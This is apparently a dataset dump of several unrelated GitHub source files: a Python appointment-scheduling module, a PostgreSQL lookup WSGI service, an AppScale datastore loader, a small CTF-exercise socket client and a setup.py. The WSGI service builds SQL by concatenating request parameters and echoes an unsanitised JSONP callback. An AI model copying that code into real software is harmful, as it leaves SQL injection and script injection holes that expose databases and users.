produces\n a new Agenda whose Appts are periods that are in the overlap\n of Appts in the first and second Agenda.\n \n Modified:\n By Jared Paeschke for use in CIS 322 project\n Appt: added from_iso_date\n added start_isoformat\n added end_isoformat\n\n\"\"\"\n\nimport datetime\nimport dateutil.parser as dt\nfrom dateutil import tz\nclass Appt:\n\n \"\"\"\n A single appointment, starting on a particular\n date and time, and ending at a later time the same day.\n \"\"\"\n \n def __init__(self, day, begin, end, desc): #changed\n \"\"\"Create an appointment on date\n from begin time to end time.\n \n Arguments:\n day: A datetime.date object. The appointment occurs this day.\n begin: A datetime.time object. When the appointment starts. \n end: A datetime.time object, \n after begin. 
When the appointment ends.\n            desc: A string describing the appointment\n        \n        Raises: \n        \tValueError if appointment ends before it begins\n        \t\n        Example:\n            Appt( datetime.date(2012,12,1),\n                datetime.time(16,30),\n                datetime.time(17,45),\n                \"Sample appointment\")\n            (December 1 from 4:30pm to 5:45pm)\n        \"\"\"\n        self.begin = datetime.datetime.combine(day, begin)\n        self.end = datetime.datetime.combine(day, end)\n        if begin >= end:\n            raise ValueError(\"Appointment end must be after begin\")\n        self.desc = desc\n        return\n\n    #added this class method to make an Appt from an ISO-formatted date-time.\n    @classmethod\n    def from_iso_date(cls, start, finish, desc):\n        begin = dt.parse(start)\n        end = dt.parse(finish)\n\n        if begin.date() != end.date():\n            raise ValueError(\"The start and finish should have the same dates.\")\n\n        result = Appt(begin.date(), begin.time(), end.time(), desc)\n        return result\n\n    @classmethod\n    def from_string(cls, txt):\n        \"\"\"Factory parses a string to create an Appt\"\"\"\n        fields = txt.split(\"|\")\n        if len(fields) != 2:\n            raise ValueError(\"Appt literal requires exactly one '|' before description\")\n        timespec = fields[0].strip()\n        desc = fields[1].strip()\n        fields = timespec.split()\n        if len(fields) != 3:\n            raise ValueError(\"Appt literal must start with date, time, time, separated by blanks\")\n        appt_date_text = fields[0]\n        appt_begin_text = fields[1]\n        appt_end_text = fields[2]\n        fields = appt_date_text.split(\".\")\n        try:\n            year = int(fields[0].strip())\n            month = int(fields[1].strip())\n            day = int(fields[2].strip())\n        except (IndexError, ValueError):\n            raise ValueError(\"Date in Appt literal should be 9999.99.99 (Year.Month.Day)\")\n\n        ### \n        date = datetime.date(year,month,day)\n        begin = datetime.datetime.strptime(appt_begin_text, \"%H:%M\").time()\n        end = datetime.datetime.strptime(appt_end_text, \"%H:%M\").time()\n\n        result = Appt(date, begin, end, desc)\n        return result\n\n    #added two methods to get the start and end datetime output in ISO format.\n    def start_isoformat(self):\n        return self.begin.replace(tzinfo=tz.tzlocal()).isoformat()\n    \n    def end_isoformat(self):\n        return self.end.replace(tzinfo=tz.tzlocal()).isoformat()\n\n    def __lt__(self, other):\n        \"\"\"Does this appointment finish before other begins?\n        \n        Arguments:\n        \tother: another Appt\n        Returns: \n        \tTrue iff this Appt is done by the time other begins.\n        \"\"\"\n        return self.end <= other.begin\n    \n    def __gt__(self, other):\n        \"\"\"Does other appointment finish before this begins?\n        \n        Arguments:\n        \tother: another Appt\n        Returns: \n        \tTrue iff other is done by the time this Appt begins\n        \"\"\"\n        return other < self\n    \n    def overlaps(self, other):\n        \"\"\"Is there a non-zero overlap between this appointment\n        and the other appointment?\n\t\tArguments:\n            other is an Appt\n        Returns:\n            True iff there exists some duration (greater than zero)\n            between this Appt and other. \n        \"\"\"\n        return not (self < other or other < self)\n    \n    def intersect(self, other, desc=\"\"):\n        \"\"\"Return an appointment representing the period in\n        common between this appointment and another.\n        Requires self.overlaps(other).\n        \n\t\tArguments: \n\t\t\tother: Another Appt\n\t\t\tdesc: (optional) description text for this appointment. \n\n\t\tReturns: \n\t\t\tAn appointment representing the time period in common\n\t\t\tbetween self and other. Description of returned Appt \n\t\t\tis copied from this (self), unless a non-null string is \n\t\t\tprovided as desc. \n        \"\"\"\n        if desc==\"\":\n            desc = self.desc\n        assert(self.overlaps(other))\n        # We know the day must be the same. 
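\n        # A hedged doctest-style sketch (appointment times invented for illustration):\n        #   a = Appt(datetime.date(2012, 12, 1), datetime.time(14, 30), datetime.time(15, 45), \"A\")\n        #   b = Appt(datetime.date(2012, 12, 1), datetime.time(15, 0), datetime.time(16, 0), \"B\")\n        #   str(a.intersect(b)) -> \"2012.12.01 15:00 15:45 | A\"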
\n # Find overlap of times: \n # Later of two begin times, earlier of two end times\n begin_time = max(self.begin.time(), other.begin.time())\n end_time = min(self.end.time(), other.end.time())\n return Appt(self.begin.date(), begin_time, end_time, desc)\n\n def union(self, other, desc=\"\"):\n \"\"\"Return an appointment representing the combined period in\n common between this appointment and another.\n Requires self.overlaps(other).\n \n\t\tArguments: \n\t\t\tother: Another Appt\n\t\t\tdesc: (optional) description text for this appointment. \n\n\t\tReturns: \n\t\t\tAn appointment representing the time period spanning\n both self and other. Description of returned Appt \n\t\t\tis concatenation of two unless a non-null string is \n\t\t\tprovided as desc. \n \"\"\"\n if desc==\"\":\n desc = self.desc + \" \" + other.desc\n assert(self.overlaps(other))\n # We know the day must be the same. \n # Find overlap of times: \n # Earlier of two begin times, later of two end times\n begin = min(self.begin, other.begin)\n end = max(self.end, other.end)\n return Appt(self.begin.date(), begin.time(), end.time(), desc)\n\n def __str__(self):\n \"\"\"String representation of appointment.\n Example:\n 2012.10.31 13:00 13:50 | CIS 210 lecture\n \n This format is designed to be easily divided\n into parts: Split on '|', then split on whitespace,\n then split date on '.' and times on ':'.\n \"\"\"\n daystr = self.begin.date().strftime(\"%Y.%m.%d \")\n begstr = self.begin.strftime(\"%H:%M \")\n endstr = self.end.strftime(\"%H:%M \")\n return daystr + begstr + endstr + \"| \" + self.desc\n\nclass Agenda:\n \"\"\"An Agenda is essentially a list of appointments,\n with some agenda-specific methods.\n \"\"\"\n\n def __init__(self):\n \"\"\"An empty agenda.\"\"\"\n self.appts = [ ]\n \n @classmethod\n def from_file(cls, f):\n \"\"\"Factory: Read an agenda from a file.\n \n Arguments: \n f: A file object (as returned by io.open) or\n an object that emulates a file (like stringio). \n returns: \n An Agenda object\n \"\"\"\n agenda = cls()\n for line in f:\n line = line.strip()\n if line == \"\" or line.startswith(\"#\"):\n # Skip blank lines and comments\n pass\n else: \n try: \n agenda.append(Appt.from_string(line))\n except ValueError as err: \n print(\"Failed on line: \", line)\n print(err)\n return agenda\n\n def append(self,appt):\n \"\"\"Add an Appt to the agenda.\"\"\"\n self.appts.append(appt)\n\n # def get_date(self):\n # \"\"\"Returns the date of the first appt in the agenda\"\"\"\n # if len(self.appts) < 1:\n # return None\n # else:\n # return self.appts[0].begin.isoformat()\n\n def intersect(self,other,desc=\"\"): \n \"\"\"Return a new agenda containing appointments\n that are overlaps between appointments in this agenda\n and appointments in the other agenda.\n\n Titles of appointments in the resulting agenda are\n taken from this agenda, unless they are overridden with\n the \"desc\" argument.\n\n Arguments:\n other: Another Agenda, to be intersected with this one\n desc: If provided, this string becomes the title of\n all the appointments in the result.\n \"\"\"\n default_desc = (desc == \"\")\n result = Agenda()\n for thisappt in self.appts:\n if default_desc: \n desc = thisappt.desc\n for otherappt in other.appts:\n if thisappt.overlaps(otherappt):\n result.append(thisappt.intersect(otherappt,desc))\n \n return result\n\n def normalize(self):\n \"\"\"Merge overlapping events in an agenda. 
For example, if \n        the first appointment is from 1pm to 3pm, and the second is\n        from 2pm to 4pm, these two are merged into an appt from \n        1pm to 4pm, with a combination description. \n        After normalize, the agenda is in order by date and time, \n        with no overlapping appointments.\n        \"\"\"\n        if len(self.appts) == 0:\n            return\n\n        ordering = lambda ap: ap.begin\n        self.appts.sort(key=ordering)\n\n        normalized = [ ]\n        # print(\"Starting normalization\")\n        cur = self.appts[0] \n        for appt in self.appts[1:]:\n            if appt > cur:\n                # Not overlapping\n                # print(\"Gap - emitting \", cur)\n                normalized.append(cur)\n                cur = appt\n            else:\n                # Overlapping\n                # print(\"Merging \", cur, \"\\n\"+\n                #      \"with \", appt)\n                cur = cur.union(appt)\n                # print(\"New cur: \", cur)\n        # print(\"Last appt: \", cur)\n        normalized.append(cur)\n        self.appts = normalized\n\n    def normalized(self):\n        \"\"\"\n        A non-destructive normalize\n        (like \"sorted(l)\" vs \"l.sort()\").\n        Returns a normalized copy of this agenda.\n        \"\"\"\n        copy = Agenda()\n        copy.appts = list(self.appts)  # copy the list; aliasing self.appts would let normalize() mutate the original\n        copy.normalize()\n        return copy\n    \n    def complement(self, freeblock):\n        \"\"\"Produce the complement of an agenda\n        within the span of a timeblock represented by \n        an appointment. For example, \n        if this agenda is a set of appointments, produce a \n        new agenda of the times *not* in appointments in \n        a given time period.\n        Args: \n            freeblock: Looking for time blocks in this period \n                that are not conflicting with appointments in \n                this agenda.\n        Returns: \n            A new agenda containing exactly the times that \n            are within the period of freeblock and \n            not within appointments in this agenda. The \n            description of the resulting appointments comes\n            from freeblock.desc.\n        \"\"\"\n        copy = self.normalized()\n        comp = Agenda()\n        day = freeblock.begin.date()\n        desc = freeblock.desc\n        cur_time = freeblock.begin\n        for appt in copy.appts:\n            if appt < freeblock:\n                continue\n            if appt > freeblock:\n                if cur_time < freeblock.end:\n                    comp.append(Appt(day,cur_time.time(),freeblock.end.time(), desc))\n                    cur_time = freeblock.end\n                break\n            if cur_time < appt.begin:\n                # print(\"Creating free time from\", cur_time, \"to\", appt.begin)\n                comp.append(Appt(day, cur_time.time(), appt.begin.time(), desc))\n            cur_time = max(appt.end,cur_time)\n\n        if cur_time < freeblock.end:\n            # print(\"Creating final free time from\", cur_time, \"to\", freeblock.end)\n            comp.append(Appt(day, cur_time.time(), freeblock.end.time(), desc))\n        return comp\n\n\n\n    def __len__(self):\n        \"\"\"Number of appointments, callable as built-in len() function\"\"\"\n        return len(self.appts)\n\n    def __iter__(self):\n        \"\"\"An iterator through the appointments in this agenda.\"\"\"\n        return self.appts.__iter__()\n\n    def __str__(self):\n        \"\"\"String representation of a whole agenda\"\"\"\n        rep = \"\"\n        for appt in self.appts:\n            rep += str(appt) + \"\\n\"\n        return rep[:-1]\n\n    def __eq__(self,other):\n        \"\"\"Equality, ignoring descriptions --- just equal blocks of time\"\"\"\n        if len(self.appts) != len(other.appts):\n            return False\n        for i in range(len(self.appts)):\n            mine = self.appts[i]\n            theirs = other.appts[i]\n            if not (mine.begin == theirs.begin and\n                    mine.end == theirs.end):\n                return False\n        return True\n
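\n# A hedged usage sketch of Agenda.complement (times invented for illustration):\n#   busy = Agenda()\n#   busy.append(Appt.from_string(\"2013.12.01 09:00 11:00 | meeting\"))\n#   free = Appt.from_string(\"2013.12.01 08:00 15:00 | available\")\n#   print(busy.complement(free))  # -> free blocks 08:00-09:00 and 11:00-15:00\n\n\n#########################\n# Self-test invoked when module is run\n# as main program. \n#########################\n\n# Commented out all test cases. 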
I am using nose to do the testing in another files\n\n# from test_harness import *\n# import io\n# def selftest_appt():\n# \"\"\"Simple smoke test for Appt class.\"\"\"\n# sample = Appt(datetime.date(2012, 10, 31),\n# datetime.time(14, 30), datetime.time(15, 45),\n# \"Sample appointment\")\n# testEQ(\"Create and format\",str(sample),\n# \"2012.10.31 14:30 15:45 | Sample appointment\") \n \n# earlier = Appt(datetime.date(2012, 10, 31),\n# datetime.time(13, 30), datetime.time(14,30), \n# \"Before my appt\")\n# later = Appt(datetime.date(2012, 10, 31),\n# datetime.time(16,00), datetime.time(21,00), \"Long dinner\")\n \n# testEQ(\"Strictly before is '<'\", earlier < later, True)\n# testEQ(\"Strictly after is '>'\", later > earlier, True)\n# testEQ(\"Not earlier than itself\", earlier < earlier, False)\n# testEQ(\"Not later than itself\", earlier > later, False)\n \n# testEQ(\"Earlier doesn't overlap later\", earlier.overlaps(later), False) \n# testEQ(\"Later doesn't overlap earlier\", later.overlaps(earlier), False)\n \n# conflict = Appt(datetime.date(2012, 10, 31), \n# datetime.time(13, 45), datetime.time(16,00),\n# \"Conflicting appt\")\n\n# testEQ(\"Should overlap\", sample.overlaps(conflict), True)\n# testEQ(\"Opposite overlap\", conflict.overlaps(sample), True)\n# overlap = sample.intersect(conflict)\n# testEQ(\"Expected intersection\", str(overlap), \n# \"2012.10.31 14:30 15:45 | Sample appointment\")\n# overlap = conflict.intersect(sample)\n# testEQ(\"Expected intersection\", str(overlap), \n# \"2012.10.31 14:30 15:45 | Conflicting appt\")\n# overlap = conflict.intersect(sample,\"New desc\")\n# testEQ(\"Expected intersection\", str(overlap), \n# \"2012.10.31 14:30 15:45 | New desc\")\n\n# text = \"2012.10.31 14:30 15:45 | from text\"\n# from_text = Appt.from_string(text)\n# testEQ(\"String <-> Appt\",text, str(from_text))\n# def die():\n# Appt.from_string(\"2012.10.31 15:45 14:30 | time traveler\")\n# testRaise(\"Time order error\", ValueError, die) \n \n\n# def selftest_agenda():\n# \"\"\"Simple smoke test for Agenda class.\"\"\"\n\n# keiko_agtxt=\"\"\"# Free times for Keiko on December 1\n# 2012.12.1 07:00 08:00 | Possible breakfast meeting\n# 2012.12.1 10:00 12:00 | Late morning meeting\n# 2012.12.1 14:00 18:00 | Afternoon meeting\n# \"\"\"\n\n# kevin_agtxt=\"\"\"2012.11.30 09:00 14:00 | I have an afternoon commitment on the 30th\n# 2012.12.1 09:00 15:00 | I prefer morning meetings\n# # Kevin always prefers morning, but can be available till 3, except for \n# # 30th of November.\n# \"\"\"\n\n# emanuela_agtxt = \"\"\"\n# 2012.12.1 12:00 14:00 | Early afternoon\n# 2012.12.1 16:00 18:00 | Late afternoon into evening\n# 2012.12.2 8:00 17:00 | All the next day\n# \"\"\"\n \n# keiko_ag = Agenda.from_file(io.StringIO(keiko_agtxt))\n# kevin_ag = Agenda.from_file(io.StringIO(kevin_agtxt))\n# emanuela_ag = Agenda.from_file(io.StringIO(emanuela_agtxt))\n\n# keiko_kevin = keiko_ag.intersect(kevin_ag)\n# kk = (\"2012.12.01 10:00 12:00 | Late morning meeting\\n\" +\n# \"2012.12.01 14:00 15:00 | Afternoon meeting\")\n# kkactual = str(keiko_kevin)\n# testEQ(\"Keiko and Kevin\", kkactual.strip(), kk.strip())\n\n# kevin_emanuela = kevin_ag.intersect(emanuela_ag)\n# ke = \"2012.12.01 12:00 14:00 | I prefer morning meetings\"\n# keactual = str(kevin_emanuela)\n# testEQ(\"Kevin and Emanuela\", keactual, ke)\n\n# everyone = keiko_kevin.intersect(emanuela_ag)\n# testEQ(\"No overlap of all three\", len(everyone), 0)\n\n# def selftest2_agenda():\n\n# print(\"\"\"\n# **********************************\n# *** 
Smoke test Agenda addenda **\n# *** normalization and complement**\n# ********************************\"\"\")\n \n# \"\"\"Additional tests for agenda normalization and complement.\"\"\"\n# # What could go wrong in sorting? \n# keiko_agtxt=\"\"\"2013.12.2 12:00 14:00 | Late lunch\n# 2013.12.1 13:00 14:00 | Sunday brunch\n# 2013.12.2 08:00 15:00 | Long long meeting\n# 2013.12.2 15:00 16:00 | Coffee after the meeting\"\"\"\n# keiko_ag = Agenda.from_file(io.StringIO(keiko_agtxt))\n\n# # Torture test for normalization\n# day_in_life_agtxt = \"\"\"\n# # A torture-test agenda. I am seeing a lot of code \n# # that may not work well with sequences of three or more\n# # appointments that need to be merged. Here's an agenda\n# # with such a sequence. Also some Beatles lyrics that have\n# # been running through my head. \n# # \n# 2013.11.26 09:00 10:30 | got up\n# 2013.11.26 10:00 11:30 | got out of bed\n# 2013.11.26 11:00 12:30 | drug a comb across my head\n# 2013.11.26 12:00 13:30 | on the way down stairs I had a smoke\n# 2013.11.26 13:00 14:30 | and somebody spoke\n# 2013.11.26 14:00 15:30 | and I went into a dream\n# #\n# # A gap here, from 15:30 to 17:00\n# # \n# 2013.11.26 17:00 18:30 | he blew his mind out in a car\n# 2013.11.26 18:00 19:30 | hadn't noticed that the lights had changed\n# 2013.11.26 19:00 20:30 | a crowd of people stood and stared\n# #\n# # A gap here, from 20:30 to 21:00\n# #\n# 2013.11.26 21:00 22:30 | they'd seen his face before\n# 2013.11.26 22:00 23:00 | nobody was really sure ...\"\"\"\n# day_in_life = Agenda.from_file(io.StringIO(day_in_life_agtxt))\n# day_in_life.normalize()\n# # How are we going to test this? I want to ignore the text descriptions.\n# # Defined __eq__ method in Agenda just for this\n# should_be_txt = \"\"\"\n# 2013.11.26 09:00 15:30 | I read the news today oh, boy\n# 2013.11.26 17:00 20:30 | about a lucky man who made the grade\n# 2013.11.26 21:00 23:00 | and though the news was rather sad\n# \"\"\"\n# should_be_ag = Agenda.from_file(io.StringIO(should_be_txt))\n# testEQ(\"Torture test normalized\",day_in_life,should_be_ag)\n\n# # Start with the simplest cases of \"complement\"\n# simple_agtxt = \"\"\"2013.12.01 12:00 14:00 | long lunch\"\"\"\n# simple_ag = Agenda.from_file(io.StringIO(simple_agtxt))\n \n# # Different day - should have no effect\n# tomorrow = Appt.from_string(\"\"\"2013.12.02 11:00 15:00 | tomorrow\"\"\")\n# simple_ag = simple_ag.complement(tomorrow)\n# testEQ(\"Yesterday's appts don't matter\",str(simple_ag).strip(),\n# \"\"\"2013.12.02 11:00 15:00 | tomorrow\"\"\")\n# # And the freeblock should not be altered\n# testEQ(\"Not clobber freeblock\",str(tomorrow),\n# \"\"\"2013.12.02 11:00 15:00 | tomorrow\"\"\")\n \n# # Freeblock completely covered\n# simple_agtxt = \"\"\"2013.12.01 12:00 14:00 | long lunch\"\"\"\n# simple_ag = Agenda.from_file(io.StringIO(simple_agtxt))\n# lunch = Appt.from_string(\"\"\"2013.12.01 12:30 13:30 | lunch\"\"\")\n# simple_ag = simple_ag.complement(lunch)\n# testEQ(\"Completely blocked freeblock\",str(simple_ag).strip(),\"\")\n# # And the freeblock should not be altered\n# testEQ(\"Not clobber freeblock 2\",str(lunch),\n# \"\"\"2013.12.01 12:30 13:30 | lunch\"\"\")\n \n# # Freeblock different times same day\n# simple_agtxt = \"\"\"2013.12.01 12:00 14:00 | long lunch\"\"\"\n# simple_ag = Agenda.from_file(io.StringIO(simple_agtxt))\n# dinner = Appt.from_string(\"\"\"2013.12.01 19:30 20:30 | dinner\"\"\")\n# simple_ag = simple_ag.complement(dinner)\n# testEQ(\"Freeblock later in day\",str(simple_ag).strip(),\n# 
\"\"\"2013.12.01 19:30 20:30 | dinner\"\"\")\n# #\n# # More complex agendas - try with two appointments\n# #\n# simple_agtxt = \"\"\"\n# 2013.12.01 9:00 11:00 | morning meeting\n# 2013.12.01 13:00 14:00 | afternoon meeting\"\"\"\n# # Cover first part first appt\n# simple_ag = Agenda.from_file(io.StringIO(simple_agtxt))\n# part_cover_first = Appt.from_string(\"2013.12.01 08:30 09:30 | morning coffee\")\n# simple_ag = simple_ag.complement(part_cover_first)\n# testEQ(\"Freeblock partly covers first appt start only\",\n# str(simple_ag).strip(), \"2013.12.01 08:30 09:00 | morning coffee\")\n# # Cover last part first appt\n# simple_ag = Agenda.from_file(io.StringIO(simple_agtxt))\n# part_cover_first = Appt.from_string(\"2013.12.01 09:30 11:30 | morning coffee\")\n# simple_ag = simple_ag.complement(part_cover_first)\n# testEQ(\"Freeblock partly covers first appt end only\",\n# str(simple_ag).strip(), \"2013.12.01 11:00 11:30 | morning coffee\")\n# # Cover first part second appt\n# simple_ag = Agenda.from_file(io.StringIO(simple_agtxt))\n# part_cover_first = Appt.from_string(\"2013.12.01 12:30 13:30 | afternoon coffee\")\n# simple_ag = simple_ag.complement(part_cover_first)\n# testEQ(\"Freeblock partly covers second appt start only\",\n# str(simple_ag).strip(), \"2013.12.01 12:30 13:00 | afternoon coffee\")\n# # Cover last part second appt\n# simple_ag = Agenda.from_file(io.StringIO(simple_agtxt))\n# part_cover_first = Appt.from_string(\"2013.12.01 13:30 14:30 | afternoon coffee\")\n# simple_ag = simple_ag.complement(part_cover_first)\n# testEQ(\"Freeblock partly covers second appt end only\",\n# str(simple_ag).strip(), \"2013.12.01 14:00 14:30 | afternoon coffee\")\n# # Cover middle part two appts\n# simple_ag = Agenda.from_file(io.StringIO(simple_agtxt))\n# part_cover_first = Appt.from_string(\"2013.12.01 10:30 13:30 | mid-day\")\n# simple_ag = simple_ag.complement(part_cover_first)\n# testEQ(\"Freeblock partly covers two appts and gap\",\n# str(simple_ag).strip(), \"2013.12.01 11:00 13:00 | mid-day\")\n# # Extend across two appts\n# simple_ag = Agenda.from_file(io.StringIO(simple_agtxt))\n# part_cover_first = Appt.from_string(\"2013.12.01 08:00 15:00 | most of day\")\n# simple_ag = simple_ag.complement(part_cover_first)\n# testEQ(\"Freeblock fully covers two appts and gap\",\n# str(simple_ag).strip(), \"2013.12.01 08:00 09:00 | most of day\" +\n# \"\\n\" + \"2013.12.01 11:00 13:00 | most of day\" + \n# \"\\n\" + \"2013.12.01 14:00 15:00 | most of day\")\n\n# if __name__ == \"__main__\":\n# selftest_appt()\n# selftest_agenda()\n# selftest2_agenda()\n \n\n \n \n \n \n \n","repo_name":"mahananaka/proj8-freetimes","sub_path":"agenda.py","file_name":"agenda.py","file_ext":"py","file_size_in_byte":23814,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"18896858721","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n#table structure for this script to work:\n#CREATE TABLE my_lookup_table (\n#\tid serial PRIMARY KEY,\n#\tcode integer,\n#\tdescription text,\n#\tgeom_type integer NOT NULL,\n#\tcategory text,\n#\tCONSTRAINT \"uc_temakode\" UNIQUE (code, geom_type)\n#);\n#geom_type: 1=point, 2=line, 3=polygon\n#\n#required paramaters are table and gtype (geom_type), category and query are for filtering results, sample query\n#http://localhost/wsgi/data.wsgi?table=my_lookup_table&category=field>ype=2&query=1234\n\nimport re #regular expression support\nimport string #string manipulation support\nfrom webob import Request\nfrom webob import 
Response\nimport psycopg2 #PostgreSQL DB Connection\nimport psycopg2.extras #e.g. for named column indexes\nimport json\nimport sys\nimport os\n\n# append the Python path with the wsgi-directory\nqwcPath = os.path.dirname(__file__)\nif not qwcPath in sys.path:\n    sys.path.append(qwcPath)\n\nimport qwc_connect\n\ndef application(environ, start_response):\n    request = Request(environ)\n    filt = []\n\n    table = request.params[\"table\"]\n    gtype = request.params[\"gtype\"]\n    categoryString = ''\n    if \"category\" in request.params:\n        categoryString = request.params[\"category\"]\n        categoryString = categoryString.strip()\n    \n    queryString = ''\n    if \"query\" in request.params:\n        queryString = request.params[\"query\"]\n        #strip away leading and trailing whitespaces\n        queryString = queryString.strip()\n    \n    sql = \"\"\n    errorText = ''\n    data = ()\n\n    #todo params check and sanitize\n    #if \"filter\" in request.params:\n    #    filterString = request.params[\"filter\"]\n    #    if len(filterString) > 0:\n    #        #sanitize\n    #        if re.search(r\"[^A-Za-z,._]\", filterString):\n    #            print >> environ['wsgi.errors'], \"wrong input: %s\" % filterString\n    #            filt = [] # set empty to have no search table error returned\n    #        else:\n    #            filt.extend(filterString.split(','))\n\n    sql += \"SELECT code, description FROM \" + table + \" WHERE geom_type=\"+gtype \n\n    if categoryString:\n        filt.extend(categoryString.split(','))\n        filtLength = len(filt)\n\n        #add single quotes\n        for i in range(filtLength):\n            filt[i] = \"'\"+filt[i]+\"'\"\n\n        sql += \" AND category IN(\"+','.join(filt)+\")\" \n    \n    if queryString:\n        #sql += \" AND (description ILIKE '%\"+query+\"%' OR code::text ILIKE '%\"+query+\"%')\"\n        sql += \" AND (description ILIKE %s\"\n        data += (\"%\" + queryString + \"%\",)\n        sql += \" OR code::text ILIKE %s)\"\n        data += (\"%\" + queryString + \"%\",)\n\n    sql += \" ORDER BY code;\"\n\n    #return [sql]\n\n    conn = qwc_connect.getConnection(environ, start_response)\n    \n    if conn is None:\n        return [\"\"]\n\n    cur = conn.cursor(cursor_factory=psycopg2.extras.DictCursor)\n\n    try:\n        cur.execute(sql, data)\n    except:\n        exceptionType, exceptionValue, exceptionTraceback = sys.exc_info()\n        conn.close()\n        errorText += 'error: could not execute query'\n        # write the error message to the error.log\n        print >> environ['wsgi.errors'], \"%s\" % errorText+\": \"+str(exceptionValue)\n        response_headers = [('Content-type', 'text/plain; charset=utf-8'),\n                            ('Content-Length', str(len(errorText)))]\n        start_response('500 INTERNAL SERVER ERROR', response_headers)\n\n        return [errorText]\n\n    rowData = []\n    rows = cur.fetchall()\n    \n    resultString = '{\"results\": '+json.dumps(rows)+'}'\n    #resultString = string.replace(resultString,'\"bbox\": \"[','\"bbox\": [')\n    #resultString = string.replace(resultString,']\",','],')\n\n    #we need to add the name of the callback function if the parameter was specified\n    if \"cb\" in request.params:\n        resultString = request.params[\"cb\"] + '(' + resultString + ')'\n\n    response = Response(resultString,\"200 OK\",[(\"Content-type\",\"text/plain; charset=utf-8\"),(\"Content-length\", str(len(resultString)) )])\n\n    conn.close()\n\n    return response(environ, start_response)\n\n\n","repo_name":"petunjiaj/gisapp","sub_path":"client/wsgi/data.wsgi","file_name":"data.wsgi","file_ext":"wsgi","file_size_in_byte":3821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"54"} +{"seq_id":"72310875680","text":"#!/usr/bin/python\n# See LICENSE file\n\nimport imp\nimport os\nimport 
sys\n\nsys.path.append(os.path.join(os.path.dirname(__file__), \"../lib/\"))\nimport constants\n\nDATASTORE_DIR= \"%s/AppDB\" % constants.APPSCALE_HOME\n\nclass DatastoreFactory:\n\n @classmethod\n def getDatastore(cls, d_type):\n \"\"\" Returns a reference for the datastore. Validates where \n the <datastore>_interface.py is and adds that path to \n the system path.\n \n Args: \n d_type: The name of the datastore (ex: cassandra)\n \"\"\"\n\n datastore = None\n mod_path = DATASTORE_DIR + \"/\" + d_type + \"/\" + d_type + \"_interface.py\"\n\n if not os.path.exists(mod_path):\n raise Exception('{} does not exist'.format(mod_path))\n\n sys.path.append(DATASTORE_DIR + \"/\" + d_type)\n module_name = '{}_interface'.format(d_type)\n handle, path, description = imp.find_module(module_name)\n\n try:\n d_mod = imp.load_module(module_name, handle, path, description)\n datastore = d_mod.DatastoreProxy()\n finally:\n if handle:\n handle.close()\n\n return datastore\n\n @classmethod\n def valid_datastores(cls):\n \"\"\" Returns a list of directories where the datastore code is\n \n Returns: Directory list \n \"\"\"\n\n dblist = os.listdir(DATASTORE_DIR)\n return dblist\n","repo_name":"trb116/pythonanalyzer","sub_path":"data/input/AppScale/appscale/AppDB/appscale_datastore_batch.py","file_name":"appscale_datastore_batch.py","file_ext":"py","file_size_in_byte":1279,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"37759999516","text":"\"\"\"\nWrite a Python script, this script should:\n1.\tconnect to this CTF game's ip and on port 20001.\n2.\tafter you connect to it, receive the prompt.\n3.\trespond to it to receive your flag.\n\"\"\"\n\n#!/usr/bin/python # This is client.py file\nimport socket # Import socket module\ns = socket.socket() # Create a socket object\nhost = '1.2.3.4' # Remote Server IP\nport = 20001 # Remote Server Port\ns.connect((host, port))\nprint (s.recv(1024))\ns.send(str.encode('Gimme flag pls'))\nprint (s.recv(1024))\ns.close() # Close the socket when done\n\n\n","repo_name":"Sambsamb/INF601b","sub_path":"CTF1-ListenPort.py","file_name":"CTF1-ListenPort.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"38474369240","text":"from __future__ import print_function\n\nfrom setuptools import setup, find_packages, Command\nimport io\nimport os\n\nhere = os.path.abspath(os.path.dirname(__file__))\ndescription = ('GOparser - A Python Framework for Working with Gene Ontology '\n '(GO) Terms and Annotations')\nversion = '1.2rc1'\n\nwith io.open(os.path.join(here, 'README.rst'), encoding='UTF-8') as fh:\n long_description = fh.read()\n\ninstall_requires = [\n 'future >= 0.15.2, < 1',\n 'six >= 1.10.0, < 2',\n 'unicodecsv >= 0.14.1, < 1',\n]\n\n# do not require installation if built by ReadTheDocs\n# (we mock these modules in docs/source/conf.py)\nif 'READTHEDOCS' not in os.environ or \\\n os.environ['READTHEDOCS'] != 'True':\n install_requires.extend([\n 'genometools >= 2.0rc1, < 3',\n ])\n\n\nclass CleanCommand(Command):\n \"\"\"Removes files generated by setuptools.\n\n \"\"\"\n # see https://github.com/trigger/trigger/blob/develop/setup.py\n user_options = []\n\n def initialize_options(self):\n pass\n\n def finalize_options(self):\n pass\n\n def run(self):\n error_msg = 'You must run this command in the package root!'\n assert os.getcwd() == here, error_msg\n os.system('rm -rf ./dist ./build ./*.egg-info ')\n\nsetup(\n 
name='goparser',\n\n    version=version,\n\n    description=description,\n    long_description=long_description,\n\n    # homepage\n    url='https://github.com/flo-compbio/goparser',\n\n    author='Florian Wagner',\n    author_email='florian.wagner@duke.edu',\n\n    license='GPLv3',\n\n    # see https://pypi.python.org/pypi?%3Aaction=list_classifiers\n    classifiers=[\n        'Development Status :: 3 - Alpha',\n\n        'Intended Audience :: Developers',\n        'Intended Audience :: Science/Research',\n        'Topic :: Scientific/Engineering :: Bio-Informatics',\n\n        'License :: OSI Approved :: GNU General Public License v3 (GPLv3)',\n\n        'Programming Language :: Python :: 2.7',\n    ],\n\n    # What does your project relate to?\n    keywords='gene ontology biology bioinformatics',\n\n    # packages=find_packages(exclude=['contrib', 'docs', 'tests*']),\n    # packages=['goparser'],\n    packages=find_packages(exclude=['docs', 'tests*']),\n\n    install_requires=install_requires,\n\n    # development dependencies\n    extras_require={\n        'docs': ['sphinx', 'sphinx_rtd_theme']\n    },\n\n    # data\n    # package_data={\n    # },\n\n    # data outside package\n    # data_files=[('my_data', ['data/data_file'])],\n\n    # executable scripts\n    # entry_points={\n    #     'console_scripts': []\n    # },\n\n    cmdclass={\n        'clean': CleanCommand,\n    },\n)\n","repo_name":"flo-compbio/goparser","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2610,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"12673662078","text":"from pymongo import MongoClient\nimport requests\nimport 